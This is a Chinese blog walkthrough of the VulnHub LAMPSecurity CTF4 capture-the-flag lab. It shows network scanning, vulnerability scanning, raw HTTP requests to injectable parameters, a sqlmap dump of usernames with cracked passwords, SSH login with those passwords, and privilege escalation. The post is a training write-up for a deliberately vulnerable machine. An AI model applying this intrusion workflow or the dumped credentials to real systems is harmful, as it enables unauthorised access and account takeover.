ctf php168,CTF靶场系列-LAMPSecurity: CTF4

下载地址https://download.vulnhub.com/lampsecurity/ctf4.zip

实战演练

使用netdiscover命令查找靶机的IP。

b3e03a3965e6e410cd080655706cf40c.png

使用nmap查看靶机开放的端口

0dca7ce5f95e6f60f79f116008079c50.png

打开浏览器

1bacdd9760992d1d14e7534fb343d462.png使用avws进行扫描

42985ffb3ae55598730dcae7e0667fbb.png目录遍历漏洞

17c944b18b00132668aeefd01120cf25.png注入POST /admin/index.php HTTP/1.1

Content-Length: 149

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://192.168.0.104:80/

Cookie: SQMSESSID=q683eq5e3hqdtute97e0bh9ub5; squirrelmail_language=en_US

Host: 192.168.0.104

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: */*

password=1&username=bbuaootc

fa8e2407be0e90cd7cd9090d0e61114a.pngGET /index.html?id=7&page=blog&title=Blog HTTP/1.1

X-Requested-With: XMLHttpRequest

Referer: http://192.168.0.104:80/

Cookie: SQMSESSID=q683eq5e3hqdtute97e0bh9ub5; squirrelmail_language=en_US

Host: 192.168.0.104

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: */*

dea667e82748c7941613a3b39adeeb0c.png用sqlmap跑到user表

28681e5000f39196c33c74dfc2311dda.png+---------+-----------+--------------------------------------------------+

| user_id | user_name | user_pass                                        |

+---------+-----------+--------------------------------------------------+

| 1       | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |

| 2       | achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |

| 3       | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |

| 4       | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |

| 5       | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)        |

| 6       | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1)       |

+---------+-----------+--------------------------------------------------+

用这些用户名和密码看看能不能登录SSH

c0fc54fdf36c624e5e6c5c300867731f.png好儿戏阿=-=居然直接可以提权

cdf8dcce37ba99d249a21abb1cec3d4c.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值